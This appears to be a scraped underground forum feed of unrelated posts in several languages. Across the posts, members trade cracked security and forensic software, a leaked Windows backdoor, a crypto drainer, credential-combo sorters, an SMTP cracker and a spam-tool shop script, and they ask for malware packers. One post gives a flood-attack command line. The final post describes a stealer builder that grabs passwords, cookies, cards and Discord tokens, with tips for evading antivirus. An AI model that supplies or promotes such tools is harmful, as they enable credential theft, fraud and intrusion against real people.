Launch the domain manager and sort through email domains, gaining a strategic
overview of your digital presence.
Show
Stats & Cleanup Button
View comprehensive statistics and perform cleanups with customizable actions,
maintaining the integrity of your data.
Remove
Inbetween Two Variables & Remove Captures
Refine your text by removing inbetweens and captures, ensuring your content is
precise and to the point.
Split
By Lines & Start Sorting
Divide content into manageable segments and initiate sorting operations,
bringing structure to your datasets.
Password
Sorting & Organize Lines
Sort passwords and organize lines alphabetically, enhancing both security and
readability.
Combine
Files & OBSOLETE__cleanup
Merge files and perform legacy cleanups, consolidating your data for optimal
use.
Update
Line Count & Create Password List
Keep track of your data metrics in real-time and create comprehensive password
lists for security analysis.
Email
Password
Extract and display email pairs, providing you with actionable data for
outreach or security assessments.
With Diamond Sorter, you 're not just managing data; you're commanding it. Experience the power, precision, and versatility that our suite of functions offers.
Look Into The Cookie Features:
Detailed
Cookie Declaration at Your Fingertips
Generate comprehensive cookie declaration tables with ease. Know your cookies'
purpose, type, and lifespan - all neatly organized for your convenience.
Scan
Cookies Like a Pro
With our Cookie Scanner Widget, dive deep into any website's cookie jar. Get
detailed reports and stay informed about the cookies you encounter online.
Sort
Cookies with Precision
Categorize cookies by function and manage them effectively. Our sorting
feature brings order to the chaos, making cookie management a breeze.
👁 Real-Time Cookie Monitoring
Stay ahead with our real-time cookie monitoring. Watch cookies as they are set
and accessed, maintaining full control over your digital footprint.
Detailed
Cookie Reports:
Comprehensive reports that list all cookies, their purpose, provider,
duration, and type.
Cookie
Declaration Table:
A table that declares all cookies in use on a website, often required for
privacy policy pages.
Educational
Resources for the Inquisitive Mind
Expand your knowledge with our educational resources. Understand cookies and
privacy laws to manage your online presence more effectively.
For a limited time I am offering a free version of this software for anyone interested - Just DM me on here or join @DiamondSorter
Pestudio Pro v9.21 (2021, Nov 19)
The goal of PE Studio is to spot artifacts of executable files in order to ease and accelerate Malware Initial Assessment. Some of PE Studio’s features are detecting file signatures, hard-coded URLs and IP addresses, metadata, imports, exports, strings, resources, manifest, rich-header, Mitre ATT &CK matrix and retrieval of VirusTotal scores.
Download - <https://mega.nz/file/xFFUUZBK#G0LD0gv5fiYGgs1qhRUt- _ARo2M0KN7B8xESw5igRJo>
VT Scan - https://www.virustotal.com/gui/file/1d2f8976553497cd08867f93366c44d8f58d3e01a0fc46fcccce8993864ba792
easy! Advanced Kerberos Relay Framework ](https://github.com/CICADA8-Research/RemoteKrbRelay)
Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework - CICADA8-Research/RemoteKrbRelay
github.com
Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework
Всем привет! Продаю последний на данный момент апдейт на рынке. Крякнутый
CheckMarx CxSAST. Вчера выкатили кряк, продам дешево. Цены на официальном
рынке интересующиеся [знают](https://about.gitlab.com/devops-tools/checkmarx-
vs-
gitlab/#:~:text=Also%2C%20like%20the%20other%20AppSec,for%20this%20open%20source%20scanning.)
(теперь
).
Не буду утруждать вас писать мне и тревожить в личку - сразу скажу, что за
копию прошу 200 долларов до пятой проданной копии. Писать по любым
существующим контактам.
Ребят, подскажите пожалуйста мейлер для отправки через smtp
Нужно чтобы он мог сам менять аккаунты по достижении лимитов.
Условно: загрузил пачку log:pass, задал все нужные параметры и шлешь.
Im looking for any good cracked packer (themida, enigma), which i can use for obfuscating malware.
Кто подскажет че за зверь
![fex.net](/proxy.php?image=https%3A%2F%2Ffex.net%2Fclient%2Fmobile%2Ficons%2Fog- image.jpg&hash=74452efce3924b638693ca944994fa2f&return_error=1)
fex.net
Добрый день, делать было нечего и решил выложить инстаграм чекер, очень простой в использовании и т.д.
Использует только netScape Cookies!
Работает с socks5, такого формата:
ip:port:log:pass
ip:port@log:pass
log:pass@ip:port
logs:pass:ip:port
Если на вашем дедике не работает, то установите сертификат сайта от инстаграм.
Virus total:
analysis/YjhjNjk0Y2FjZDFlNTMwYWNiNDZjM2I3NGRjMzg1MzQ6MTY5ODMxODgyOQ==)
VirusTotal
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile- analysis%2FYjhjNjk0Y2FjZDFlNTMwYWNiNDZjM2I3NGRjMzg1MzQ6MTY5ODMxODgyOQ%3D%3D%2Fimages%2Ffavicon.svg&hash=7c60699adb1be24f696d2ed7eba0698a&return_error=1) www.virustotal.com
Собирал pyinstaller'ом
Spoiler: Скрин работы
Скачать:
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/18016d14c9708443/#Ji38KDi2OiUP0ourxmR6nA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Получение строк из файла или файлов в папке
Сохранение в виде Log:Pass или Url:Log:Pass
Сортировка по запросу в виде сайта (google.com) или ключевого слова в ссылке
(google)
Многопоточная сортировка и одновременная запись в файлы с пропуском повторов
строк - чтение базы любого размера
Чистка базы любого размера - строки обрабатываются сразу при чтении, без
загрузки списком в оперативную память
Чистка нескольких баз по отдельности или всех баз в один файл
Удаление невалид строк (A-z / 0-9 / Специмволы | 10-256 символов | UNKNOWN
Удаление дублей реализовано через xxh3 хеш
[Ветка с github](https://github.com/Underneach/Nicotine-String- Sorter/releases/tag/2.7.0)
Подскажите пожалуйста насколько возможно и тяжело будет создать софт, который сможет собирать всю инфу об упоминании мем коинов в твиттере? Софт должен сам распознать, что упоминают мем коин и на основе этого должен собрать количество упоминаний этого мем коина в твиттере.
Есть у кого нибудь кряк ратник Malvina?
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FW2fkBnk%2FSQLBOX-Ultimate- Injection-Tool-Life-Time-Activated.jpg&hash=3173a86a4dfff26ad4e41c03fbe99696)
SQLBOX™ is a huge innovation – It’s like SQLmap on steroids!
With SQLBOX™ we are closing a gap that has always been a problem. We enable
you to perform pentests using sqlmap,
with a graphical user interface and with extensions and features that are so
far unique!
Our solution will save you a lot of time and effort. You will be amazed how easy it can be to do extensive tests with complex setups. You will love it!
Dashboard with an overview of all statistics. The number of your previous tests, your available shells, number of presets and dumps, as well as a history of your scans.
A list of all previous scans, including the associated parameters that were taken into account in the scan. You can send the information from the history to the scanner with one click.
We have integrated the command line directly into the software. And this offers you interactive functions. Mark to copy, right click to paste and much more.
If you copy a URL including all parameters - for example from your browser - and paste it into SQLBOX™, the parameters are automatically read from the URL and transferred to the settings.
You can switch between the different methods with a simple click without having to adjust your other setups. You can even load request files with a single click. SQLBOX™ does the rest automatically.
Changing the GET/POST parameters on the command line is hell. With SQLBOX™ you can arrange these with a click and display them cleanly, and simply select the desired parameters (inject to) from the list.
Do you want to test different types of methods, but don't want to keep adjusting commands in the command line? With our software you can switch the desired settings on and off with a click.
Did you also wish there were presets in sqlmap where you can save your best working "secret combinations" of settings? SQLBOX™ makes this dream come true! You can save individual presets with a custom name and use them flexibly.
It often happens that you want to check a URL again with different settings. A flush session deletes previous data from the scan. We have implemented a function that prevents this and makes a backup of the previous scan.
With the Data Sniper you can navigate through the databases and tables (accessible with injection) with simple clicks. You can also flexibly choose which columns you want to dump from the table. Incredibly quick and easy!
With our file dumper you can load files from the affected server. In order to speed up the work, we have prepared a long list of possible files of interest for this purpose. The search function makes this feature a dream!
In order to be able to upload files, we offer you the File Uploader. This also offers suggestions to speed up your work. You can also list your own shells and flexibly choose the one you want.
Do you also find it annoying to enter tamper scripts from your head into the command line and repeatedly need the manual? With SQLBOX™ we offer you a remedy! Select and activate the tamper scripts from a list (including descriptions) or use the quick search.
We offer you a project management system that lists all of your scans and dumps. You can select tables and files from a project and display them directly, copy content from the dumps with ease and use it further.
We are constantly developing the software and adding new functions. There are already tons of ideas that will make SQLBOX™ even better and more incredible.
-WwW.Dr-FarFar.CoM.zip**
Updated By Dr.FarFar : ConEmu + SQLMap + nMap + Git-Dumper + UserAgents + LFI Payloads + Tor Files
Click to expand...
Fletime 收集从 0.71 到 3.5 的所有版本
[隐藏]
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/QYJCjJrY#ukd7KJEXYOWFDCCHmy0JZQ)
57 files
mega.nz
[/ 隐藏]
The Python script below performs bulk lookup of Mail Exchanger (MX) records
for a list of email addresses. It makes use of Python's asyncio
and aiodns
libraries for asynchronous DNS queries, which enables it to process multiple
requests concurrently, significantly improving performance. It also includes a
progress bar, courtesy of the tqdm
library, providing real-time feedback
about the processing progress.
The email addresses are read from a file, with one address per line. The script then extracts the domain from each address and queries its MX records. If multiple MX records are found for a domain, all are captured. Any errors encountered during the query process, such as an absence of MX records or network issues, are also recorded.
The script supports multiple DNS servers to enhance reliability and potentially improve response times. If a query to one server fails, it will try the next server in the list. The results of the queries are written to an output file immediately after each lookup. This ensures that the data is saved even if the script gets interrupted for any reason.
Use Cases:
This script can be used for various purposes such as:
1. Email validation: By checking for the existence of an MX record, you can
determine if a domain is set up to receive emails.
2. Server migration: If you're migrating email servers, you can use this
script to monitor changes to MX records.
3. Cybersecurity: MX record lookups can be part of investigating email-
related cybersecurity threats.
4. Research: This script can be used for research purposes to analyze the
distribution of email server providers.
Python:Copy to clipboard
import asyncio
import aiodns
from tqdm import tqdm
email_file = 'emailleads.txt'
output_file = 'mx_records.txt'
dns_servers = ['8.8.8.8', '8.8.4.4', '1.1.1.1', '9.9.9.9']
resolvers = [aiodns.DNSResolver(nameservers=[server]) for server in dns_servers]
async def get_mx_record(email):
domain = email.split('@')[-1]
for resolver in resolvers:
try:
result = await resolver.query(domain, 'MX')
return email, str(result[0].host)
except Exception:
pass
return email, "Error: all DNS queries failed"
async def main():
with open(email_file, 'r') as f:
email_list = [line.strip() for line in f]
tasks = [get_mx_record(email) for email in email_list]
for i in tqdm(asyncio.as_completed(tasks), total=len(tasks), ncols=70):
email, mx_record = await i
with open(output_file, 'a') as out_f:
out_f.write(f"{email}: {mx_record}\n")
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
SMTP Heist Advanced with Custom SMTPHost + Find SMTPHost: Built with PyQt6 UI,
Tracking SMTP Cracked Results (Good/Bad), Report to Telegram, Advanced Custom
SMTPHost + Ports with Custom HTML Letter Preview
.
Screenshots
Dashboard (Reported)
Realtime Update
Settings/Config
SMTP Heist is an Open Source tool useful for those trying to crack/pentest
SMTP for a Single Host, Multi Host, or Multi Port services. You can modify
settings in the UI under the Settings/Config tab.
Two main things to discover the host with your email combo:
1. Target Hostname of the SMTP Service. - You can use Multi-HOSTS, for
example, smtp.gmail.com.
2. Input SMTP Host You can also add more domains and configurations to the
Config.ini in the second line:
smtp_subdomain = smtp, smtpout, webmail Add More . After adding to
smtp_subdomain, you need to input SMTPHOST smtp.host.default to allow you
Enable Work with smtp_subdomain = smtp, smtpout, webmail.
Support File => Load *.txt
Your combo file (list_combo.txt) must contain the following format:
HOST|PORT|EMAIL|PASSWORD or
EMAIL|PASSWORD.
If your combo list contains email:password, replace : with |. Invalid or empty
combos will be skipped automatically.
Features
SMTP Heist v1.0
Track Report with Good/Failed - Task/Remaining - Progress
Config SMTP Host with 2 Methods + Set your own mail sent Success Result
Advanced Discovery Target without Skip
Report Result to Telegram
[video=youtube]
Download Open Source :
You must have at least 1 reaction(s) to view the content.
Download Released (Compiled) exe from Github :
You must have at least 1 reaction(s) to view the content.
сливаю бэкдор для windows, писался на golang имеется лишь исходник бота, остальное через build.bat создается, в случае какой-либо не понятной проблемы обращайтесь в лс помогу.
ссылка: https://fex.net/ru/s/azprypf
Вручную копировать все Ip из DNS занимает много времени и сил, при больших
объемах.
Возможно ли как-то облегчить или упростить ?
В поиске ничего сам не нашел.
MobaXterm Professional Edition 21.2 & All Plugins
Download - https://gofile.io/d/uRO9Lz
VirusTotal - https://www.virustotal.com/gui/file...2b5ce322c251b12c482aa0ea518901ef257/detection
Есть ли на данный момент такая прога которая позволяет взломать вк ? Если да то где её можно приобрести естественно не бесплатно .
Я заметил что стандартное удаление Windows работает медленно. Причиной тому -
подсчёт процентов и примерное количество времени.
Но я решил обойти это, тем самым увеличив скорость удаления более чем в 3
раза!
Просто скачиваем regedit
файл
и пользуемся!
Чтобы вызвать меню RMDIR - надо выделить папку в проводнике и зажать ПКМ
Spoiler: regedit код
Code:Copy to clipboard
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\Directory\shell\Item0]
"MUIVerb"="RMDIR"
"Position"="bottom"
"Icon"="imageres.dll,262"
[HKEY_CLASSES_ROOT\Directory\shell\Item0\command]
@="cmd.exe cmd.exe /c \"pushd \"%V\" && popd && rmdir /q/s \"%V\"\""
или nulled goldeneagle.click/paid-version, было бы хорошо если бы был бы на python
Selling 3 Slots in my Bunq phone number Checker
CPM : 500-1000 ( Depending on your proxies and hardware )
input: list of phone numbers
output : valid phone numbers + Firstname of Account holder
Price : 1000 per month
Good price offer if you take more months
Interested? shoot me a DM
dealing with middleman only
Доброго времени суток ! я ищю мануал по написанию стиллера
всем привет
ищу софт со скрина или его аналоги. нужно, чтобы результат чека выдавался как на втором скрине (Вид лога - email:password | 137 -число сообщений вашего запроса)
нужно хотя бы название и контакты селлера, но если кто-то располагает кряком - будет вообще идеально)
Нужен готовый проект BLTools(.sln, .csproj), который нормально собирается и
работает.
Версия не важна.
Надеюсь у кого-то есть она
Приветствую. У кого-нибудь найдется скомпилированный zerologon для x32 (server 2003)? Скомпилировал питон скрипт, но на windows 2003 запускается с ошибкой
Какие есть варианты использовать Maltego XL без оплаты? Может, ключи активации или crack?
То есть закинули Базу номеров и софт выдаёт +к номеру и ФИО ИНН и СНИЛС
node raw1.js GET threads target time rate proxyfile
Download - https://files.fm/u/83p4u7yv7d
VT -
https://www.virustotal.com/gui/file...f076c7d2813bb51fe2e45c7e24e3894976d?nocache=1
Доброго времени суток уважаемые форумчане.
Помогите пожалуйста советом где найти парсер карт Google maps. Основные
функции которые нужны - парсинг по рубрикатору по выбранной стране и городу.
Всем заранее спасибо!
looking for coder to create burp enterprise edition crack source code
to can access also the web interface
2000$ for the task thanks
шапка
Golang URL Discoverer (Obtains URLs by looking through scripts, buttons, fields, network, etc)
This is a tool I made so you can obtain URLs from a domain in less than 2 minutes pretty quickly. It will log all third party out of scope URLs as well as in scope URLs.
Requires Golang version 1.21 or higher.
The -inscope flag will only follow all in scope URLs. If you wish to scan and find third party URLs from third party URLs use the flag -outscope "" with nothing in the quotes.
If you do not know how to use Golang please google how to build a Golang file. Rename the .txt to .go and have fun.
To use:
Напишите в комментарии, если нужен, то залью вместе с бдшками.
Продам
Привет всем! Ищу рабочий желательно новый кряк Brute Ratel, буду очень благодарен! Нуждаюсь
нашел на просторах инета. только так и не понял куда что ему прописать. может кто разберется? и пояснит тут
anonfiles.com
Наткнулся на гитхабе. Уверен что для кого-то будет полезной и интересой софтиной. И да, кто попробует- дайте фитбек)
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F1b98b228038d53a4c56845763c8f34245408606e4c19e22d79be8b9217f57d98%2FKhanejo%2FInstagram- mass-reporter&hash=f76ef08f257c0fdaaf614d57b8600123&return_error=1)
report Instagram accounts ](https://github.com/Khanejo/Instagram-mass- reporter)
This bot helps users to mass report Instagram accounts - GitHub - Khanejo/Instagram-mass-reporter: This bot helps users to mass report Instagram accounts
github.com
where can i get phantomware , zappers , or sales suppression as a
service.
if you have any links or can make dm
Professional-Edition-Life-Time- Activated.jpg&hash=948d436438abf3fcbca98d6b3487754e)
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
Братцы доброго дня всем. Подскажите слив свежий дроппера под расширение хрома.
Буду очень признателен
Brothers, good afternoon to everyone. Tell me a fresh dropper drain for the
chrome extension. I would be very grateful
Hello, I need the program kon-boot, if anyone has it for free, please give it
to me
Sorry if I'm posting in the wrong section
Всем привет,
Я решил поделиться софтом который позволяет генерировать француские ид. код
мрз и все остальное нормально генерирует можете проверить на программе револют
xidrf
На ************ стартовал 1-й конкурс кейсов.
Рекомендую почитать мои статьи:
](https://zenno.club/discussion/threads/tapalka-na-zennoposter-c-namajni-sebe- zennocoin.120216/)
Привет всем. Как известно тренд нынешнего года - всевозможные нажималки на экран, типа NOTCOIN и ему подобных. Поэтому господа (и дамы) любящие поразбивать яйца (на экране), подвигать котов, покликать на монетки, представляю первую тапалку на Zennoposter - @zennocoinbot Правда, эта версия...
zenno.club
клиентов с помощью ZennoPoster (C#) ](https://zenno.club/discussion/threads/kak-sdelat-tochnyj-target-v-reklame- na-sostojatelnyx-i-ne-tolko-klientov-s-pomoschju-zennoposter-c.120173/)
Приветствую всех. Поделюсь темой, как сделать таргет в контекстной рекламе на состоятельных/целевых клиентов из любой страны. Геотаргетинг Геотаргетинг – это способ, который позволяет показывать рекламу целевой аудитории на основе их местоположения. Этот метод позволяет бизнесу улучшить...
zenno.club
Там же вы можете забрать бесплатные шаблоны к статьям.
**Уиверсальный инструмент OSINT для анализа любого веб-сайта.
Отображает информацию об IP, цепочке SSL, записи DNS, файлы cookie, заголовки,
информация о домене, местоположение сервера, связанные хосты, цепочки
перенаправления, записи TXT, состояние сервера, открытые порты и многое
другое.
Понимание этих деталей может помочь оптимизировать и защитить веб-сайт.
Полезно для проведения OSINT-расследований и понимания инфраструктуры веб- сайта и мер безопасности.
==========DOWNLOAD==========
**
**
**
Нужен Oxygen Forensic & Md next & Md red для разблокировки андроид & iphone , кому не жалко и не сложно скиньте ссылку или напишите в лс, буду благодарен
Looking for good data scraper software for consumer database scraping from mutliple site grabbing automatically like Name, email, Address, Income, DOB, etc. for any country?
тоже взято за бугром
TODAY, I HAVE PROVIDED SPAMMING TOOLS AUTOSHOP SCRIPT
WITH WHICH YOU CAN OPEN YOUR OWN SHOP TO SELL SPAM TOOLS!
SHOP HAS SECTIONS OF CARDS, ACCOUNTS, RDP, CPANEL, SSH/WHM, SHELL, MAILERS,
WEBMAIL
NOTE : The Script isn't 100% working, as it have bugs like payment gateway isn't working(i have tried fixing it but it needs time, you can do it on your own! ,the table data is not being populated from the database!, There was no db file so I've created demo table in db (you can find the sql file in folder
I have fixed many things and also added many lines of code(it took me days °^°)+ created an admin panel using same theme as the shop where you can CRUD USERS, CRUD NEWS, not many features but you can add on your own!
The File has a Readme.md file, that contains instructions on configuring the script and also I've mentioned bugs in it!.
that's all!
YOU CAN DOWNLOAD FULL SCRIPT + SQL HERE :
You must spend at least 360 day(s) on the forum to view the content.
Download Link - https://www.upload-4ever.com/36pansqm7i2g
axiom-forensics-premium/)
intuitive Analytics tools to easily analyze data in one case file.**
Recover data from Smartphones, Computers, and the Cloud
Examine evidence across all your sources in one case file
Surface and share insights with powerful analytics and reporting tools
for Digital Forensics Examiners**
Digital investigations today are complex, with potential evidence increasingly
spread out over a wide variety of devices, applications, and services.
Examiners need solutions that can quickly and easily surface the evidence that
matters to their case.
Magnet AXIOM enables you to recover, analyze, and report on the digital
evidence from Smartphones, Computers, and the Cloud, all in one case file.
Examining more apps, more storage, and more hidden data than ever before can
be time consuming.
AXIOM’s powerful and intuitive Analytics features like Connections, Timeline,
and Magnet.
AI help forensics examiners and professionals quickly uncover the truth and
understand what truly happened.
Magnet AXIOM Forensics Full Activated
Magnet AXIOM 5.8.0.27495 December 14, 2021
Android
![Breadwallet-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FBreadwallet.png&hash=a42f095cac6e0f6dca0afe60ddc96ebe)
Breadwallet Events NEW
![Breadwallet-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FBreadwallet.png&hash=a42f095cac6e0f6dca0afe60ddc96ebe)
Breadwallet Transactions NEW
![Coinomi Transactions-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FCoinomi.png&hash=60c5983786a1140c9348cf674d52ba92)
Coinomi Transactions NEW
![Discord-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FDiscord.png&hash=f29dbc4a5b60261262cfe627056ccb27)
Discord
![Facebook-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook.png&hash=1ac4fd059def72df064e36f1dc0d077a)
Facebook Comments NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger
![Facebook-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook.png&hash=1ac4fd059def72df064e36f1dc0d077a)
Facebook Posts NEW
![Facebook-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook.png&hash=1ac4fd059def72df064e36f1dc0d077a)
Facebook Tags NEW
![Signal-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSignal.png&hash=7a9f7eee3947bde2d1eb2fd57037559c)
Signal
![Signal Decryption-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSignal.png&hash=7a9f7eee3947bde2d1eb2fd57037559c)
Signal Decryption Validation for Media decryption
![Signal Options Dialog-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSignal.png&hash=7a9f7eee3947bde2d1eb2fd57037559c)
Signal Options Dialog
macOS
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Calls NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Groups NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Users Contacted NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Messages NEW
![File System Info-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFile%2520System%2520Info.png&hash=8da82805160f34534711b84c4b84e07f)
File System Events
iOS
![Breadwallet-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FBreadwallet.png&hash=a42f095cac6e0f6dca0afe60ddc96ebe)
Breadwallet Transactions NEW
![Coinomi-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FCoinomi.png&hash=60c5983786a1140c9348cf674d52ba92)
Coinomi Transactions NEW
![iOS_Contacts-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FiOS_Contacts.png&hash=014f004a0972c2678f74d23a82245840)
Contacts
![IOS Messages-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FIOS%2520Messages.png&hash=0ab6af7e7a5a6949fdd8403dcd6b6758)
iMessage
![IOS Messages-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FIOS%2520Messages.png&hash=0ab6af7e7a5a6949fdd8403dcd6b6758)
Messages
![Snapchat-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSnapchat.png&hash=2f32df7afe84347cab6a276f4a4e63c4)
Snapchat
![Viber-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FViber.png&hash=bd1cf75f2249ac348a3664be0d845e86) Viber
![WhatsApp-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FWhatsApp.png&hash=c36b6b249cfec35ae58b7e2104f63331)
WhatsApp
Windows
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Calls NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Groups NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Messages NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger - Users Contacted NEW
![Telegram-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FTelegram.png&hash=c11ec4e09da06274496a3cbd54c12165)
Telegram Media NEW
For artifacts that contain geolocation data, you can now view world map previews from different explorers in AXIOM without having to open World map view. From the preview, you can open World map view with the artifact of interest shown on the map.
-WwW.Dr-FarFar.CoM.zip**
Source : [Dr.FarFar](https://www.dr-farfar.com/magnet-axiom-forensics- premium/)
Здесь мы соберём исходные коды миллиона и одной программы-демонстрации со всех возможных источников.
Я хочу ясно сказать, что используйте их исключительно в учебных и образовательных целях. Большинство из них имеют задние двери.
Я начну первым.
](https://anonfiles.com/01AaX219z8/SpaceX_DRAINER_v2_by_ELONLAB_2_zip)
anonfiles.com
Никто не знает хороший брутфорс фот для инсты
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FGZqOBcY71NM3jm1IV- oqf_vGcZAyrRITyJOI2fsnNqglNBSmL2OudN63L4wnwG9pYF1xGsTx38UIDt8SzqrIBMa9cV4_8fwUO7h4ifUbBtbxt85uBf0gyr9qcev4BOa7yKZdE6eFi5hiln3K0U-M9qzWv09hE8BoaRQ8_xlVdd89SnNY9YQ9Pwqt4E3Ppi3o__OUe8tYeaZzH78gZo4j40xLjw45q2CGPlAzZi0ebhILGS5TriE- xWP2d7-uOCV2DYFxLVF3ba9_GHoeiaqSQ_E84z1xcg6pU_K4RqgGxZfwwBqadj4zx2Cu2f_x9q5THaheSqXWbcYsGhjEssCzsg.jpg&hash=a04ea97a1febbc7b1ceadbd2c68b2426&return_error=1)
🔥 Chat: t.me/pwn3rzs_chat 🧑🏻💻 Forum: cyberarsenal.org 🖥 GitHub: github.com/Pwn3rzs 📧 Contact: cyberarsenal.org/members/?key=staff_members
t.me
**Acunetix Version 14 build 14.9.220830118 - 30th August 2022 (Windows & Linux)
Downloads**:
Linux: https://mega.nz/file/i5M2lJwB#KxvTmH26MpGXqwlk9PtD1hZoBzAu9tHjzaDazLmozis
Windows: https://mega.nz/file/GlFnjIgZ#1L8x5CCsih1aztd3bF7Wd4bj_qtLvGZY8B9vmhu1UBo
Every version has it's own read me, please follow it!
Password: Pwn3rzs
Changelog :
New Features
- Added support for the Zend Framework in the PHP IAST AcuSensor
New Vulnerability Checks
- New check for Oracle E-Business Suite iStore open user registration
- New check for InfluxDB Unauthorized Access Vulnerability
- New check for Bonita Authorization Bypass (CVE-2022-25237)
- New check for Oracle ADF Faces ‘Miracle’ RCE (CVE-2022-21445)
Updates
- Various DeepScan Improvements
- Updated to Chromium 104.0.5112.101 (Linux) / 104.0.5112.102 (Windows)
- Improved XSS in URI (folder/file)
- Improved handling of SourceMaps
- Updated exposed web installers check
- Updated exposed development files check
- Updated exposed monitoring systems check
Fixes
- Fixed issue in the PHP IAST AcuSensor when reporting SCA components
- Fixed scanner crash
For issues or anything, let us know!
Enjoy!
Установите Python и запустите билдер https://www.python.org/downloads/
python builder.py
Все команды pip install прописаны в скрипте
Не загружайте exe в https://www.virustotal.com/
Считанные детектики уже есть, добрые люди не поленились загрузили, поэтому
пройдитесь поверх другим криптером
Процесс иньекции Keylogger после кражи (необязательно, именно кейлоггер больше
всех палится)
Сделать снимок экрана
Wi-Fi граббер
Создать Mutex (Anti Spam)
Discord Injection (отправка токена, пароля и электронной почты при входе в
систему или при изменении пароля)
Захватчик паролей
Граббер кредитных карт
Куки-граббер
Захват истории
Граббер
